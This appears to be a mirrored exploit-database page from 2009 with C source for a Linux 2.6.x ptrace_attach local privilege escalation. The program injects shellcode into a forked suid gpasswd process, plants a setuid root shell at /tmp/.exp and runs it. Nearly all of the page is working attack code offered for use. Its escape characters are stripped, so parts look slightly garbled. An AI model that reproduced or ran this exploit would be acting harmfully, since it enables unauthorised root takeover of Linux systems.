Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit
# Published : 2009-05-13
# Author : s0m3b0dy
# Previous Title : Pinnacle Studio 12 (.hfz) Directory Traversal Vulnerability
# Next Title : CastRipper 2.50.70 (.m3u) Local Buffer Overflow Exploit

/*
ptrace_attach privilege escalation exploit by s0m3b0dy

[*] tested on Gentoo 2.6.29rc1

grataz:
Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo...

email: s0m3b0dy1 (at) gmail.com
*/

#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
char shellcode[] =
"x6ax46x58x31xdbx31xc9xcdx80xebx21x5fx6ax0bx58x99" 
"x52x66x68x2dx63x89xe6x52x68x2fx2fx73x68x68x2fx62"
"x69x6ex89xe3x52x57x56x53x89xe1xcdx80xe8xdaxffxffxff"
"echo "#include <stdio.h>nmain(){setuid(0);if(getuid()==0) printf(\"r00teed!\n\");execv(\"/bin/bash\",0);return 0;}" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;";
struct user_regs_struct322 {
        unsigned long ebx, ecx, edx, esi, edi, ebp, eax;
        unsigned short ds, __ds, es, __es;
        unsigned short fs, __fs, gs, __gs;
        unsigned long orig_eax, eip;
        unsigned short cs, __cs;
        unsigned long eflags, esp;
        unsigned short ss, __ss;
};

main()
{
struct user_regs_struct322  regs;
struct stat buf;
int i,o;
unsigned long * src;
unsigned long * dst;
char *env[2];
env[0]="/usr/bin/gpasswd";  // some suid file
env[1]=0;
if((o=fork()) == 0)
{
execve(env[0],env,0);
exit(0);
}
if(ptrace(PTRACE_ATTACH,o,0,0)==-1)
{
printf("n[-] Attachn");
exit(0);
}
 wait((int *)0);
if (ptrace(PTRACE_GETREGS, o, NULL, &regs) == -1){
                printf("n[-] read registersn");
		exit(0);
}
printf( "[+] EIP - 0x%08lxn", regs.eip);
dst= (unsigned long *) regs.eip;
src = (unsigned long *) shellcode;
for(i=0;i<sizeof(shellcode) -1;i+=4)
if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){
                       printf("n[-] write shellcoden");
			exit(0);
}
ptrace(PTRACE_CONT, o, 0, 0);
ptrace(PTRACE_DETACH,o,0,0);
printf("[+] Waiting for root...n");
sleep(2);
if(!stat("/tmp/.exp",&buf))
{
printf("[+] Executing suid shell /tmp/.exp...n"); 
execv("/tmp/.exp",0);
}
else
{
printf("[-] Damn no r00t here :(n");
}
return 0;
}

// www.Syue.com [2009-05-13]